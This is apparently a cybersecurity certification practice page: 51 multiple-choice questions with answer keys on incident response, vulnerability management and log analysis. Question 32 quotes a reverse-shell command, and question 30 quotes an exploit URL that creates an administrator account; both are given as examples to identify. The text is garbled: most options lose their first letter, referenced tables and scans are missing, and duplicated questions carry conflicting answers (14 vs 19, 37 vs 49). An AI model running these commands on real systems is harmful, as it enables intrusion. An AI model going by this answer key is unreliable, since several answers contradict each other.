لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت
السؤال #1
The security team reviews a web server for XSS and runs the following Nmap scan:Which of the following most accurately describes the result of the scan?
A. n output of characters > and " as the parameters used m the attempt
B. he vulnerable parameter ID http://172
C. he vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. he vulnerable parameter and characters > and " with a reflected XSS attempt
عرض الإجابة
اجابة صحيحة: D
السؤال #2
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. redentialed network scanning
B. assive scanning
C. gent-based scanning
D. ynamic scanning
عرض الإجابة
اجابة صحيحة: C
السؤال #3
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. DN
B. ulnerability scanner
C. NS
D. eb server
عرض الإجابة
اجابة صحيحة: C
السؤال #4
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. xternal
B. gent-based
C. on-credentialed
D. redentialed
عرض الإجابة
اجابة صحيحة: B
السؤال #5
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A. he current scanners should be migrated to the cloud
B. loud-specific misconfigurations may not be detected by the current scanners
C. xisting vulnerability scanners cannot scan IaaS systems
D. ulnerability scans on cloud environments should be performed from the cloud
عرض الإجابة
اجابة صحيحة: B
السؤال #6
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
A. ervice-level agreement
B. hange management plan
C. ncident response plan
D. emorandum of understanding
عرض الإجابة
اجابة صحيحة: C
السؤال #7
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. ard disk
B. rimary boot partition
C. alicious files
D. outing table
E. tatic IP address
عرض الإجابة
اجابة صحيحة: D
السؤال #8
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. he server was configured to use SSL to securely transmit data
B. he server was supporting weak TLS protocols for client connections
C. he malware infected all the web servers in the pool
D. he digital certificate on the web server was self-signed
عرض الإجابة
اجابة صحيحة: D
السؤال #9
A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:Which of the following log entries provides evidence of the attempted exploit?
A. og entry 1
B. og entry 2
C. og entry 3
D. og entry 4
عرض الإجابة
اجابة صحيحة: A
السؤال #10
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
A. ean time between failures
B. ean time to detect
C. ean time to remediate
D. ean time to contain
عرض الإجابة
اجابة صحيحة: D
السؤال #11
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. eoblock the offending source country
B. lock the IP range of the scans at the network firewall
C. erform a historical trend analysis and look for similar scanning activity
D. lock the specific IP address of the scans at the network firewall
عرض الإجابة
اجابة صحيحة: B
السؤال #12
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. ommand and control
B. ctions on objectives
C. xploitation
D. elivery
عرض الإجابة
اجابة صحيحة: A
السؤال #13
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
A. o satisfy regulatory requirements for incident reporting
B. o hold other departments accountable
C. o identify areas of improvement in the incident response process
D. o highlight the notable practices of the organization's incident response team
عرض الإجابة
اجابة صحيحة: C
السؤال #14
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. mean time to remediate of 30 days
B. mean time to detect of 45 days
C. mean time to respond of 15 days
D. hird-party application testing
عرض الإجابة
اجابة صحيحة: A
السؤال #15
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:Which of the following should the security analyst prioritize for remediation?
A. ogers
B. rady
C. rees
D. anning
عرض الإجابة
اجابة صحيحة: B
السؤال #16
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. hut the network down immediately and call the next person in the chain of command
B. etermine what attack the odd characters are indicative of
C. tilize the correct attack framework and determine what the incident response will consist of
D. otify the local law enforcement for incident response
عرض الإجابة
اجابة صحيحة: B
السؤال #17
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. isk contents
B. ackup data
C. emporary files
D. unning processes
عرض الإجابة
اجابة صحيحة: D
السؤال #18
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?
A. unction w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }
B. unction x() { info=$(geoiplookup $1) && echo “$1 | $info” }
C. unction y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }
D. unction z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }
عرض الإجابة
اجابة صحيحة: B
السؤال #19
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. mean time to remediate of 30 days
B. mean time to detect of 45 days
C. mean time to respond of 15 days
D. hird-party application testing
عرض الإجابة
اجابة صحيحة: C
السؤال #20
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. cope
B. eaponization
C. VSS
D. sset value
عرض الإجابة
اجابة صحيحة: B
السؤال #21
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:? created the initial evidence log.? disabled the wireless adapter on the device.? interviewed the employee, who was unable to identify the website that was accessed.? reviewed the web proxy traffic logs.Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware
B. Install an additional malware scanner that will send email alerts to the analyst
C. Configure the system to use a proxy server for Internet access
D. Delete the user profile and restore data from backup
عرض الإجابة
اجابة صحيحة: A
السؤال #22
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
A. nterview the users who access these systems
B. can the systems to see which vulnerabilities currently exist
C. onfigure alerts for vendor-specific zero-day exploits
D. etermine the asset value of each system
عرض الإجابة
اجابة صحيحة: D
السؤال #23
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. here is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. n on-path attack is being performed by someone with internal access that forces users into port 80
C. he web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. n error was caused by BGP due to new rules applied over the company's internal routers
عرض الإجابة
اجابة صحيحة: B
السؤال #24
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
A. lone the virtual server for forensic analysis
B. og m to the affected server and begin analysis of the logs
C. estore from the last known-good backup to confirm there was no loss of connectivity
D. hut down the affected server immediately
عرض الإجابة
اجابة صحيحة: A
السؤال #25
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes
عرض الإجابة
اجابة صحيحة: A
السؤال #26
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. ITRE ATT&CK
B. yber Kill Cham
C. WASP
D. TIX/TAXII
عرض الإجابة
اجابة صحيحة: A
السؤال #27
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. uman resources must email a copy of a user agreement to all new employees
B. upervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. ll new employees must take a test about the company security policy during the onboardmg process
D. ll new employees must sign a user agreement to acknowledge the company security policy
عرض الإجابة
اجابة صحيحة: D
السؤال #28
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. unction w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
B. unction x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
C. unction y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”
D. unction z() { c=$(geoiplookup$1) && echo “$1 | $c” }
عرض الإجابة
اجابة صحيحة: C
السؤال #29
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
A. esting
B. mplementation
C. alidation
D. ollback
عرض الإجابة
اجابة صحيحة: C
السؤال #30
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administratorWhich of the following controls would work best to mitigate the attack represented by this snippet?
A. Limit user creation to administrators only
B. Limit layout creation to administrators only
C. Set the directory trx_addons to read only for all users
D. Set the directory V2 to read only for all users
عرض الإجابة
اجابة صحيحة: A
السؤال #31
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. ean time to detect
B. umber of exploits by tactic
C. lert volume
D. uantity of intrusion attempts
عرض الإجابة
اجابة صحيحة: A
السؤال #32
A security analyst detects an exploit attempt containing the following command:sh -i >& /dev/udp/10.1.1.1/4821 0>$lWhich of the following is being attempted?
A. CE
B. everse shell
C. SS
D. QL injection
عرض الإجابة
اجابة صحيحة: B
السؤال #33
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
A. pload the binary to an air gapped sandbox for analysis
B. end the binaries to the antivirus vendor
C. xecute the binaries on an environment with internet connectivity
D. uery the file hashes using VirusTotal
عرض الإجابة
اجابة صحيحة: A
السؤال #34
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”
D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }
عرض الإجابة
اجابة صحيحة: C
السؤال #35
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. SSTMM
B. IEM
C. OAR
D. WASP
عرض الإجابة
اجابة صحيحة: C
السؤال #36
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. eaconing
B. ross-site scripting
C. uffer overflow
D. HP traversal
عرض الإجابة
اجابة صحيحة: A
السؤال #37
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:Which of the following should be completed first to remediate the findings?
A. sk the web development team to update the page contents
B. dd the IP address allow listing for control panel access
C. urchase an appropriate certificate from a trusted root CA
D. erform proper sanitization on all fields
عرض الإجابة
اجابة صحيحة: D
السؤال #38
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. roprietary systems
B. egacy systems
C. nsupported operating systems
D. ack of maintenance windows
عرض الإجابة
اجابة صحيحة: C
السؤال #39
When starting an investigation, which of the following must be done first?
A. otify law enforcement
B. ecure the scene
C. eize all related evidence
D. nterview the witnesses
عرض الإجابة
اجابة صحيحة: B
السؤال #40
Which of the following security operations tasks are ideal for automation?
A. uspicious file analysis:Look for suspicious-looking graphics in a folder
B. irewall IoC block actions:Examine the firewall logs for IoCs from the most recently published zero-day exploitTake mitigating actions in the firewall to block the behavior found in the logsFollow up on any false positives that were caused by the block rules
C. ecurity application user errors:Search the error logs for signs of users having trouble with the security applicationLook up the user's phone numberCall the user to help with any questions about using the application
D. mail header analysis:Check the email header for a phishing confidence metric greater than or equal to fiveAdd the domain of sender to the block listMove the email to quarantine
عرض الإجابة
اجابة صحيحة: D
السؤال #41
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. hange the display filter to ftp
B. hange the display filter to tcp
C. hange the display filter to ftp-data and follow the TCP streams
D. avigate to the File menu and select FTP from the Export objects option
عرض الإجابة
اجابة صحيحة: C
السؤال #42
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:Which of the following tuning recommendations should the security analyst share?
A. et an HttpOnly flag to force communication by HTTPS
B. lock requests without an X-Frame-Options header
C. onfigure an Access-Control-Allow-Origin header to authorized domains
D. isable the cross-origin resource sharing header
عرض الإجابة
اجابة صحيحة: C
السؤال #43
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall
C. Perform a historical trend analysis and look for similar scanning activity
D. Block the specific IP address of the scans at the network firewall
عرض الإجابة
اجابة صحيحة: B
السؤال #44
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
A. ata enrichment
B. ecurity control plane
C. hreat feed combination
D. ingle pane of glass
عرض الإجابة
اجابة صحيحة: D
السؤال #45
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. AM
B. DS
C. KI
D. LP
عرض الإجابة
اجابة صحيحة: D
السؤال #46
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
A. elp desk
B. aw enforcement
C. egal department
D. oard member
عرض الإجابة
اجابة صحيحة: C
السؤال #47
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
A. CI Security Standards Council
B. ocal law enforcement
C. ederal law enforcement
D. ard issuer
عرض الإجابة
اجابة صحيحة: D
السؤال #48
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:Security Policy 1006: Vulnerability Management1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.3. The Com
A. ame: THOR
B. ame: CAP
C. ame: LOKI
D. ame: THANOS
عرض الإجابة
اجابة صحيحة: B
السؤال #49
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:Which of the following should be completed first to remediate the findings?
A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields
عرض الإجابة
اجابة صحيحة: C
السؤال #50
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie
عرض الإجابة
اجابة صحيحة: D
السؤال #51
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
A. enerate a hash value and make a backup image
B. ncrypt the device to ensure confidentiality of the data
C. rotect the device with a complex password
D. erform a memory scan dump to collect residual data
عرض الإجابة
اجابة صحيحة: A

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.